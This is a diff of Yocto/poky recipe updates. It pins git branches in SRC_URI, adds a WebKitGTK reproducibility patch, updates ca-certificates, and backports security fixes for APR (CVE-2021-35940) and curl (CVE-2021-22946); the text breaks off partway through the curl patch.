b/poky/meta/recipes-rt/rt-tests/rt-tests.inc index 3ac39d90c3..29ebe2d361 100644 --- a/poky/meta/recipes-rt/rt-tests/rt-tests.inc +++ b/poky/meta/recipes-rt/rt-tests/rt-tests.inc @@ -2,7 +2,7 @@ SRCREV = "dff174f994f547a5785d32454865f140daacb0f5" PE = "1" -SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git" +SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main" # 1.2 to 1.5 seem to be development versions UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))" diff --git a/poky/meta/recipes-sato/images/core-image-sato.bb b/poky/meta/recipes-sato/images/core-image-sato.bb index e50b24a476..300d8e0d43 100644 --- a/poky/meta/recipes-sato/images/core-image-sato.bb +++ b/poky/meta/recipes-sato/images/core-image-sato.bb @@ -13,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0" TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0" QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}' +QB_MEM_qemuarmv5 = "-m 256" QB_MEM_qemumips = "-m 256" diff --git a/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb b/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb index 85c2c500ea..4d5d299d47 100644 --- a/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb +++ b/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb @@ -16,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \ DEPENDS = "gtk+3 intltool-native gettext-native" PV = "0.8.18.1.11+git${SRCPV}" -SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git" +SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https" SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb index 547e851c15..5733a36b12 100644 --- a/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb @@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon" # SRCREV tagged 0.2 SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://no-handed.patch" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" diff --git a/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb index cc51f47b63..2a2eb24f57 100644 --- a/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb +++ b/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb @@ -13,7 +13,7 @@ SECTION = "x11/wm" # SRCREV tagged 2.2 SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777" -SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \ +SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \ file://vfolders/* \ " diff --git a/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb index c659964a2b..54fe578cd3 100644 --- a/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb +++ b/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb @@ -23,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel" RREPLACES_${PN} = "matchbox-panel" RCONFLICTS_${PN} = "matchbox-panel" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://0001-applets-systray-Allow-icons-to-be-smaller.patch \ " diff --git a/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb index 9f00281dde..e2e81c2905 100644 --- a/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb @@ -11,7 +11,7 @@ SECTION = "x11/utils" #SRCREV tagged 0.2 SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb index 7a043d3447..bc4024736f 100644 --- a/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb @@ -2,7 +2,7 @@ require matchbox-theme-sato.inc # SRCREV tagged 0.2 SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78" -SRC_URI = "git://git.yoctoproject.org/matchbox-sato" +SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/puzzles/puzzles_git.bb b/poky/meta/recipes-sato/puzzles/puzzles_git.bb index befe4a53f4..2edc9ada2e 100644 --- a/poky/meta/recipes-sato/puzzles/puzzles_git.bb +++ b/poky/meta/recipes-sato/puzzles/puzzles_git.bb @@ -9,7 +9,7 @@ DEPENDS = "libxt" # The libxt requires x11 in DISTRO_FEATURES REQUIRED_DISTRO_FEATURES = "x11" -SRC_URI = "git://git.tartarus.org/simon/puzzles.git \ +SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=master \ file://fix-compiling-failure-with-option-g-O.patch \ file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \ file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \ diff --git a/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb index 2b1f513f1c..7e7612253d 100644 --- a/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb +++ b/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb @@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3" # SRCREV tagged 0.3 SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756" -SRC_URI = "git://git.yoctoproject.org/screenshot" +SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb index d01177f9b9..19c4a73dc3 100644 --- a/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb +++ b/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb @@ -9,7 +9,7 @@ SECTION = "x11" # SRCREV tagged 0.0.2 SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2" -SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \ +SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \ file://addsoundkeys.patch \ file://70settings-daemon.sh \ " diff --git a/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch new file mode 100644 index 0000000000..528dec8c8b --- /dev/null +++ b/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch @@ -0,0 +1,31 @@ +From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Sun, 2 May 2021 13:10:49 -0700 +Subject: [PATCH] MiniBrowser: Fix reproduciblity + +Do not emit references to source dir in generated sourcecode + +Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283] +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt +index 93b62521..482d3b00 100644 +--- a/Tools/MiniBrowser/gtk/CMakeLists.txt ++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt +@@ -48,8 +48,8 @@ add_custom_command( + OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c + ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h + MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list +- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c +- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h ++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c ++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h + VERBATIM) + + if (DEVELOPER_MODE) +-- +2.31.1 + diff --git a/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb b/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb index ceda2992d7..2e3f0aa682 100644 --- a/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb +++ b/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb @@ -20,6 +20,7 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \ file://0001-Fix-build-with-musl.patch \ file://include_array.patch \ file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \ + file://0001-MiniBrowser-Fix-reproduciblity.patch \ " SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464" diff --git a/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch b/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch new file mode 100644 index 0000000000..00befdacee --- /dev/null +++ b/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch @@ -0,0 +1,58 @@ + +SECURITY: CVE-2021-35940 (cve.mitre.org) + +Restore fix for CVE-2017-12613 which was missing in 1.7.x branch, though +was addressed in 1.6.x in 1.6.3 and later via r1807976. + +The fix was merged back to 1.7.x in r1891198. + +Since this was a regression in 1.7.0, a new CVE name has been assigned +to track this, CVE-2021-35940. + +Thanks to Iveta Cesalova <icesalov redhat.com> for reporting this issue. + +https://svn.apache.org/viewvc?view=revision&revision=1891198 + +Upstream-Status: Backport +CVE: CVE-2021-35940 +Signed-off-by: Armin Kuster <akuster@mvista.com> + + +Index: time/unix/time.c +=================================================================== +--- a/time/unix/time.c (revision 1891197) ++++ b/time/unix/time.c (revision 1891198) +@@ -142,6 +142,9 @@ + static const int dayoffset[12] = + {306, 337, 0, 31, 61, 92, 122, 153, 184, 214, 245, 275}; + ++ if (xt->tm_mon < 0 || xt->tm_mon >= 12) ++ return APR_EBADDATE; ++ + /* shift new year to 1st March in order to make leap year calc easy */ + + if (xt->tm_mon < 2) +Index: time/win32/time.c +=================================================================== +--- a/time/win32/time.c (revision 1891197) ++++ b/time/win32/time.c (revision 1891198) +@@ -54,6 +54,9 @@ + static const int dayoffset[12] = + {0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334}; + ++ if (tm->wMonth < 1 || tm->wMonth > 12) ++ return APR_EBADDATE; ++ + /* Note; the caller is responsible for filling in detailed tm_usec, + * tm_gmtoff and tm_isdst data when applicable. + */ +@@ -228,6 +231,9 @@ + static const int dayoffset[12] = + {306, 337, 0, 31, 61, 92, 122, 153, 184, 214, 245, 275}; + ++ if (xt->tm_mon < 0 || xt->tm_mon >= 12) ++ return APR_EBADDATE; ++ + /* shift new year to 1st March in order to make leap year calc easy */ + + if (xt->tm_mon < 2) diff --git a/poky/meta/recipes-support/apr/apr_1.7.0.bb b/poky/meta/recipes-support/apr/apr_1.7.0.bb index 432fa3255c..92cc61a864 100644 --- a/poky/meta/recipes-support/apr/apr_1.7.0.bb +++ b/poky/meta/recipes-support/apr/apr_1.7.0.bb @@ -23,6 +23,7 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \ file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \ file://libtoolize_check.patch \ file://0001-Add-option-to-disable-timed-dependant-tests.patch \ + file://CVE-2021-35940.patch \ " SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7" diff --git a/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb index 986f0124e2..97b88ec033 100644 --- a/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb +++ b/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb @@ -9,7 +9,7 @@ SECTION = "console/utils" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/intel/${BPN}" +SRC_URI = "git://github.com/intel/${BPN};branch=master;protocol=https" SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch new file mode 100644 index 0000000000..5c4a32f526 --- /dev/null +++ b/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch @@ -0,0 +1,80 @@ +From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex@linutronix.de> +Date: Mon, 18 Oct 2021 12:05:49 +0200 +Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired + certificates." + +This avoids a dependency on python3-cryptography, and only checks +for expired certs (which is upstream concern, but not ours). + +Upstream-Status: Inappropriate [oe-core specific] +Signed-off-by: Alexander Kanavin <alex@linutronix.de> +--- + debian/changelog | 1 - + debian/control | 2 +- + mozilla/certdata2pem.py | 11 ----------- + 3 files changed, 1 insertion(+), 13 deletions(-) + +diff --git a/debian/changelog b/debian/changelog +index 531e4d0..4006509 100644 +--- a/debian/changelog ++++ b/debian/changelog +@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low + - "Trustis FPS Root CA" + - "Staat der Nederlanden Root CA - G3" + * Blacklist expired root certificate "DST Root CA X3" (closes: #995432) +- * mozilla/certdata2pem.py: print a warning for expired certificates. + + -- Julien Cristau <jcristau@debian.org> Thu, 07 Oct 2021 17:12:47 +0200 + +diff --git a/debian/control b/debian/control +index 4434b7a..5c6ba24 100644 +--- a/debian/control ++++ b/debian/control +@@ -3,7 +3,7 @@ Section: misc + Priority: optional + Maintainer: Julien Cristau <jcristau@debian.org> + Build-Depends: debhelper-compat (= 13), po-debconf +-Build-Depends-Indep: python3, openssl, python3-cryptography ++Build-Depends-Indep: python3, openssl + Standards-Version: 4.5.0.2 + Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git + Vcs-Browser: https://salsa.debian.org/debian/ca-certificates +diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py +index ede23d4..7d796f1 100644 +--- a/mozilla/certdata2pem.py ++++ b/mozilla/certdata2pem.py +@@ -21,16 +21,12 @@ + # USA. + + import base64 +-import datetime + import os.path + import re + import sys + import textwrap + import io + +-from cryptography import x509 +- +- + objects = [] + + # Dirty file parser. +@@ -121,13 +117,6 @@ for obj in objects: + if obj['CKA_CLASS'] == 'CKO_CERTIFICATE': + if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]: + continue +- +- cert = x509.load_der_x509_certificate(obj['CKA_VALUE']) +- if cert.not_valid_after < datetime.datetime.now(): +- print('!'*74) +- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL']) +- print('!'*74) +- + bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\ + .replace(' ', '_')\ + .replace('(', '=')\ +-- +2.20.1 + diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch deleted file mode 100644 index f343ebf16e..0000000000 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch +++ /dev/null @@ -1,26 +0,0 @@ -sbin/Makefile: Allow the sbin path to be configurable - -Some project sharing ca-certificates from Debian allow configuration -of the installation location. Make the sbin location configurable. - -Also ensure the target directory exists - -Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> -Upstream-Status: Submitted [https://salsa.debian.org/debian/ca-certificates/-/merge_requests/5] - ---- ca-certificates-20130119.orig/sbin/Makefile -+++ ca-certificates-20130119/sbin/Makefile -@@ -3,9 +3,12 @@ - # - # - -+SBINDIR = /usr/sbin -+ - all: - - clean: - - install: -- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/ -+ install -d $(DESTDIR)$(SBINDIR) -+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/ diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch deleted file mode 100644 index f78790923c..0000000000 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch +++ /dev/null @@ -1,33 +0,0 @@ -update-ca-certificates: Replace deprecated mktemp -t with mktemp --tmpdir - -According to coreutils docs, mktemp -t is deprecated, switch to the ---tmpdir option instead. - -Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> -Upstream-Status: Submitted [https://salsa.debian.org/debian/ca-certificates/-/merge_requests/5] - -[This was originally for compatibility with toybox but toybox now -supports -t] ---- - sbin/update-ca-certificates | 6 +++--- - 1 file changed, 3 insertions(+), 3 deletions(-) - -diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates -index 79c41bb..ae9e3f1 100755 ---- a/sbin/update-ca-certificates -+++ b/sbin/update-ca-certificates -@@ -113,9 +113,9 @@ trap cleanup 0 - - # Helper files. (Some of them are not simple arrays because we spawn - # subshells later on.) --TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")" --ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")" --REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")" -+TEMPBUNDLE="$(mktemp --tmpdir "${CERTBUNDLE}.tmp.XXXXXX")" -+ADDED="$(mktemp --tmpdir "ca-certificates.tmp.XXXXXX")" -+REMOVED="$(mktemp --tmpdir "ca-certificates.tmp.XXXXXX")" - - # Adds a certificate to the list of trusted ones. This includes a symlink - # in /etc/ssl/certs to the certificate file and its inclusion into the --- -2.1.4 diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb b/poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb index 7dcc86fdc1..a54d6b458a 100644 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb +++ b/poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb @@ -14,15 +14,14 @@ DEPENDS_class-nativesdk = "openssl-native" # Need rehash from openssl and run-parts from debianutils PACKAGE_WRITE_DEPS += "openssl-native debianutils-native" -SRCREV = "181be7ebd169b4a6fb5d90c3e6dc791e90534144" +SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8" -SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \ file://0002-update-ca-certificates-use-SYSROOT.patch \ file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \ - file://update-ca-certificates-support-Toybox.patch \ file://default-sysroot.patch \ - file://sbindir.patch \ file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \ + file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)" diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch new file mode 100644 index 0000000000..4afd755149 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch @@ -0,0 +1,86 @@ +Backport of: + +From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001 +From: Daniel Stenberg <daniel@haxx.se> +Date: Mon, 21 Sep 2020 09:15:51 +0200 +Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy" + +When using HTTPS proxy, SSL is used but not in the view of the FTP +protocol handler itself so separate the connection's use of SSL from the +FTP control connection's sue. + +Reported-by: Mingtao Yang +Fixes #5523 +Closes #6006 + +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe <mac@mcrowe.com> +--- + lib/ftp.c | 13 ++++++------- + lib/urldata.h | 1 + + 2 files changed, 7 insertions(+), 7 deletions(-) + +diff --git a/lib/ftp.c b/lib/ftp.c +index 3382772..677527f 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn) + { + CURLcode result = CURLE_OK; + +- if(conn->ssl[FIRSTSOCKET].use) { ++ if(conn->bits.ftp_use_control_ssl) { + /* PBSZ = PROTECTION BUFFER SIZE. + + The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says: +@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + } + #endif + +- if(data->set.use_ssl && +- (!conn->ssl[FIRSTSOCKET].use || +- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] && +- !conn->proxy_ssl[FIRSTSOCKET].use))) { +- /* We don't have a SSL/TLS connection yet, but FTPS is ++ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) { ++ /* We don't have a SSL/TLS control connection yet, but FTPS is + requested. Try a FTPS connection now */ + + ftpc->count3 = 0; +@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + result = Curl_ssl_connect(conn, FIRSTSOCKET); + if(!result) { + conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */ ++ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */ + result = ftp_state_user(conn); + } + } +@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn) + * + */ + static CURLcode ftp_connect(struct connectdata *conn, +- bool *done) /* see description above */ ++ bool *done) /* see description above */ + { + CURLcode result; + struct ftp_conn *ftpc = &conn->proto.ftpc; +@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn, + result = Curl_ssl_connect(conn, FIRSTSOCKET); + if(result) + return result; ++ conn->bits.ftp_use_control_ssl = TRUE; + } + + Curl_pp_init(pp); /* init the generic pingpong data */ +diff --git a/lib/urldata.h b/lib/urldata.h +index ff2d686..d1fb4a9 100644 +--- a/lib/urldata.h ++++ b/lib/urldata.h +@@ -461,6 +461,7 @@ struct ConnectBits { + EPRT doesn't work we disable it for the forthcoming + requests */ + BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */ ++ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */ + #endif + BIT(netrc); /* name+password provided by netrc */ + BIT(userpwd_in_url); /* name+password found in url */ diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch new file mode 100644 index 0000000000..98032d8b78 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch @@ -0,0 +1,328 @@ +Backport of: + +From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001 +From: Patrick Monnerat <patrick@monnerat.net> +Date: Wed, 8 Sep 2021 11:56:22 +0200 +Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd + +In imap and pop3, check if TLS is required even when capabilities +request has failed. + +In ftp, ignore preauthentication (230 status of server greeting) if TLS +is required. + +Bug: https://curl.se/docs/CVE-2021-22946.html +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe <mac@mcrowe.com> +CVE: CVE-2021-22946 +--- + lib/ftp.c | 9 ++++--- + lib/imap.c | 24 ++++++++---------- + lib/pop3.c | 33 +++++++++++------------- + tests/data/Makefile.inc | 2 ++ + tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++ + tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++ + tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++ + 7 files changed, 195 insertions(+), 36 deletions(-) + create mode 100644 tests/data/test984 + create mode 100644 tests/data/test985 + create mode 100644 tests/data/test986 + +diff --git a/lib/ftp.c b/lib/ftp.c +index 677527f..91b43d8 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + /* we have now received a full FTP server response */ + switch(ftpc->state) { + case FTP_WAIT220: +- if(ftpcode == 230) +- /* 230 User logged in - already! */ +- return ftp_state_user_resp(conn, ftpcode, ftpc->state); ++ if(ftpcode == 230) { ++ /* 230 User logged in - already! Take as 220 if TLS required. */ ++ if(data->set.use_ssl <= CURLUSESSL_TRY || ++ conn->bits.ftp_use_control_ssl) ++ return ftp_state_user_resp(conn, ftpcode, ftpc->state); ++ } + else if(ftpcode != 220) { + failf(data, "Got a %03d ftp-server response when 220 was expected", + ftpcode); +diff --git a/lib/imap.c b/lib/imap.c +index 66172bd..9880ce1 100644 +--- a/lib/imap.c ++++ b/lib/imap.c +@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn, + line += wordlen; + } + } +- else if(imapcode == IMAP_RESP_OK) { +- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { +- /* We don't have a SSL/TLS connection yet, but SSL is requested */ +- if(imapc->tls_supported) +- /* Switch to TLS connection now */ +- result = imap_perform_starttls(conn); +- else if(data->set.use_ssl == CURLUSESSL_TRY) +- /* Fallback and carry on with authentication */ +- result = imap_perform_authentication(conn); +- else { +- failf(data, "STARTTLS not supported."); +- result = CURLE_USE_SSL_FAILED; +- } ++ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { ++ /* PREAUTH is not compatible with STARTTLS. */ ++ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) { ++ /* Switch to TLS connection now */ ++ result = imap_perform_starttls(conn); + } +- else ++ else if(data->set.use_ssl <= CURLUSESSL_TRY) + result = imap_perform_authentication(conn); ++ else { ++ failf(data, "STARTTLS not available."); ++ result = CURLE_USE_SSL_FAILED; ++ } + } + else + result = imap_perform_authentication(conn); +diff --git a/lib/pop3.c b/lib/pop3.c +index 57c1373..145b2b4 100644 +--- a/lib/pop3.c ++++ b/lib/pop3.c +@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code, + } + } + } +- else if(pop3code == '+') { +- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { +- /* We don't have a SSL/TLS connection yet, but SSL is requested */ +- if(pop3c->tls_supported) +- /* Switch to TLS connection now */ +- result = pop3_perform_starttls(conn); +- else if(data->set.use_ssl == CURLUSESSL_TRY) +- /* Fallback and carry on with authentication */ +- result = pop3_perform_authentication(conn); +- else { +- failf(data, "STLS not supported."); +- result = CURLE_USE_SSL_FAILED; +- } +- } +- else +- result = pop3_perform_authentication(conn); +- } + else { + /* Clear text is supported when CAPA isn't recognised */ +- pop3c->authtypes |= POP3_TYPE_CLEARTEXT; ++ if(pop3code != '+') ++ pop3c->authtypes |= POP3_TYPE_CLEARTEXT; + +- result = pop3_perform_authentication(conn); ++ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use) ++ result = pop3_perform_authentication(conn); ++ else if(pop3code == '+' && pop3c->tls_supported) ++ /* Switch to TLS connection now */ ++ result = pop3_perform_starttls(conn); ++ else if(data->set.use_ssl <= CURLUSESSL_TRY) ++ /* Fallback and carry on with authentication */ ++ result = pop3_perform_authentication(conn); ++ else { ++ failf(data, "STLS not 